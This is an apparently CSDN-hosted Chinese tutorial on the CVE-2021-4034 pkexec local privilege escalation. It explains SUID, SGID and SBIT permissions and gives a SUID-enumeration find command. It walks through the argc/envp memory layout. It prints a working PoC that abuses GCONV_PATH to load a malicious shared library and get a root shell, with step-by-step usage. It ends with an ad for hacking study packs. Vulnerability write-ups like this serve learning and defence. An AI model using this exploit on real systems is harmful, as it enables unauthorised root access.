前言
本篇文章主要叙述CVE-2021-4034漏洞,该漏洞影响的linux发行版众多,例如:Ubuntu、CentOS、Debian等等,该漏洞为Linux系统本地提权漏洞,利用脚本已经公开,利用简单且稳定,脚本地址:Github
当攻击者获取目标系统普通用户权限时,利用该脚本即可直接获得root权限,该漏洞的主要原因是因为polkit中的pkexec程序对参数个数判断不佳,导致数组溢出,具体分析过程将在下面慢慢介绍。首先得先了解下suid、sgid、sbit的特殊权限,将对后面分析起到帮助,也对后续的渗透学习开辟一些新鲜道路。
一、SUID、SGID、SBIT的介绍
suid、sgid、sbit是文件权限管理的特殊命令,基本的Linux权限为9个,分别为rwx rwx rwx,利用命令ll -a
加文件路径会发现有一些特殊的权限位符号。
Linux有十二个权限符 :
- SUID的基本权限位有x权限,标识符为s,代表数字为4,生效对象为用户位
- SGID的基本权限位有x权限,标识符为s,代表数字为2,生肖对象为用户组位
- SBIT的基本权限位有x权限,标识符为t,代表数字为1,生效对象为其他用户
1)SUID权限位
- suid通过s字符标识判定,当s出现在文件所有者的x权限时,如上图/usr/bin/passwd文件,状态位:-rwsr-xr-x,此时就可以判定为时suid。
- suid权限仅对二进制程序有效
- 该权限仅在执行该程序的过程中有效
- 执行者将拥有该程序拥有者的权限
**SUID的目的 :**为了让本来没有相应权限的用户运行这个程序,可以短暂的享有该程序拥有者的权限。就比如上方图例,
/usr/bin/passwd
该二进制程序是用来修改密码的,但是linux系统中用户众多,有root、普通用户等等,这些用户都需要在特殊情况修改密码,比如在忘记 登录密码时 。
具体流程 :
- 因为passwd的权限对任何用户都是可执行的,所以系统中不管什么用户都可执行
- passwd文件的拥有者是属于root
- 当普通用户在执行passwd命令时,会在执行期间短暂拥有root权限
- 普通用户借助root权限修改了/etc/shadow文件
- 最后把密码修改成功
- 这时候,在攻击者的角度,就可以利用此类拥有者为root的二进制程序,提权成功
注 : 当在渗透过程中获取了shell ,可以使用find命令查询系统上所有的s权限位文件,命令:
find / -perm -4000 -type f -ls
参数解释:
-perm:利用权限进制搜索
-type:指定文件类型(l:软连接类型;d:文件夹类型;f:文件类型)
-ls:搜索的数据进行格式化输出
-delete:对匹配的数据进行删除
2)SGID权限位
- sgid和suid差不多,先查看s是否在所属用户组的x位置上,如果在,那就是sgid
- sgid获得该程序所属用户组的权限
- sgid仅对二进制程序有用
- sgid主要用在目录上
注 :sgid,如果用户在此目录下具有w,写的权限的话,若使用者在此目录下建立新文件,则新文件的群组与此目录的群组相同。
3)SBIT权限位
- sbit主要针对other来设置的,和suid,sgid大同小异,只是功能上不同而已
- sbit只对目录有效,当用户在该目录下新建文件或目录时,仅自己和root才有权利删除
- 最具代表的就是/tmp目录,之前在渗透项目中,获得了webshell,都要先进到/tmp目录下进行一系列下载之类的操作,因为/tmp目录,任何人都可以增加、修改文件(权限为rwx)
注 :SBIT对文件不起作用
总结
二、CVE-2021-4034
这里是学习了看雪论坛的某位大佬对该漏洞的整体分析,然后自己理解进行叙述!实例也是该大佬的例子。
1)相关知识
1、实例代码:
#include<stdio.h>
int main(int argc, char** argv){
printf("argc:%d\n", argc);
for(int i;i<argc;i++){
printf("%s\n",argv[i]);
}
return 0;
}
上述代码中,argc是参数个数,argv是存放的具体参数,argv[0]—>程序本身,argv[1]—>第一个参数,argv[2]—>第二个参数,argv[argc],0表示结束。
-
当执行程序时,argc的取值至少为1,因为即使不加参数,argv[0]也要指向程序路径本身。pkexec在特殊情况下,如使用execve来调用程序,并给argv传值 NULL,则argc为0。
-
execve函数:
-
#include<unistd.h>
int execve(const char *pathname, char *const argv[], char *const envp[]); -
execve.c:
-
#include<unistd.h>
int main(int argc, char **argv){
return execve(“./test”, NULL, NULL);
}
注 :argv和envp在内存中的分布是连续的。
-
execve.c:
#include<unistd.h>
int main(){
char* const argv[] = {
“AAAAAA1111”,
“AAAAAA1111”,
“AAAAAA1111”,
NULL
};
char* const envp[] = {
“AAAAAA1111”,
“AAAAAA1111”,
“AAAAAA1111”,
NULL
};
return execve(“./test”, argv, envp);
} -
利用execve调用test,将上述三个值分别传入argv和envp中
-
#include<stdio.h>
int main(int argc, char** argv)
{
printf(“argc: %d\n”, argc);
for(int i; i<8; i++) {
if(argv[i]!=NULL) {
printf(“argv[%d]: %s\n”, i, argv[i]);
} else {
printf(“argv[%d]: NULL\n”, i);
}
}
return 0;
1
} -
argc为3,加上截止符0,argv的大小为4,这里直接打印了8个值,显然是越界了,通过实例,表明argv与envp在内存布局上是连续的,envp紧跟argv之后。
具体分析过程请参考本文最后 (大佬分析的特别完善,受益匪浅)
2)漏洞原理
本漏洞主要被利用的包括以下几点:
- pkexec为 suid 程序
- 当argc为0时,pkexec会读取argv[1]变量,而由于刚才实例分析,内存布局是连续的,因此实际上会读取到第一个环境变量。
- 读取到argv[1]之后,若其不是绝对路径,则pkexec会将其理解为相对路径,会在环境变量中查找PATH变量,将其转换为实际路径。
- 若PATH环境变量包含一个攻击者可控的路径,则pkexec转换后的实际路径将会是这个攻击者可控的路径下的一个子目录,则显然此实际路径也是攻击者可控的。例如: /bin/sh 、 PATH=/bin:/usr/bin
- pkexec会对argv[1]赋值,将其修改为上述得到的实际路径,但是argv[1]此时实际上指向的是pkexec的第一个环境变量,也就是说,pkexec将自己的第一个环境变量修改为这个实际路径了。
- pkexec会在程序运行过程中调用g_printerr函数,这个函数会在运行的时候按需载入GCONV_PATH环境变量指向的路径下的gconv-modules文件中写明的外部动态链接库(so),并运行其中的初始化函数gconv_init。
攻击者可以做以下操作提升至root权限:
#include <unistd.h>
int main(int argc, char **argv)
{
char * const args[] = {
NULL
};
char * const environ[] = {
"pwnkit.so:.",
"PATH=GCONV_PATH=.",
"SHELL=/lol/i/do/not/exists",
"CHARSET=PWNKIT",
"GIO_USE_VFS=",
NULL
};
return execve("/usr/bin/pkexec", args, environ);
}
这是CVE-2021-4034的poc,将其复制到目标机器/tmp目录下,编译运行,赋权chmod u+s,然后执行即可利用suid特殊权限,获得root权限。
或者可以:
- 在自己可控的目录下生成一个gconv-modules文件,并将文件内容设置为指向某个so文件。
- 在so文件中实现gconv_init函数,此函数主要就是生成一个root shell(由于pkexec默认开启SUID),而在so库的此函数中,设置当前进程用户的uid为0,即可提权到root用户。
- 调用pkexec,而且在调用的时候通过命令行参数设置使得pkexec得到的argc为0,将环境变量中的第一个设置为非/开头的一个相对路径,将环境变量中的PATH变量的值设置为GCONV_PATH=开头的字符串,使得对应的路径指向上述存储gconv-modules文件的路径。
3)影响版本
主要有:pkexec版本为0.105之前
- Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2
- Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6
- Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1
- Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
- CentOS 6:polkit-0.96-11.el6_10.2
- CentOS 7:polkit-0.112-26.el7_9.1
三、修复
目前各大linux发行版都给出了安全补丁,升级即可修复该漏洞。
漏洞参考:https://bbs.pediy.com/thread-271423.htm#msg_header_h2_6
如果你是准备学习网络安全或者正在学习,下面这些你应该能用得上:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓
小白成长路线图
许多入门者转行网络安全,或者是有一定基础想进一步深化学习,却发现不知从何下手。接下来我将从成长路线开始一步步带大家揭开网安的神秘面纱。
1.成长路线图
共可以分为:
一、基础阶段
二、渗透阶段
三、安全管理
四、提升阶段
同时每个成长路线对应的板块都有配套的视频提供:
视频配套资料&国内外网安书籍、文档
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料
SRC技术文档汇总
还有大家最喜欢的黑客技术、
绿盟护网行动
网络安全源码合集+工具包
网络安全面试题
最后就是大家最关心的网络安全面试题板块
所有资料共87.9G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方CSDN官方合作二维码免费领取哦~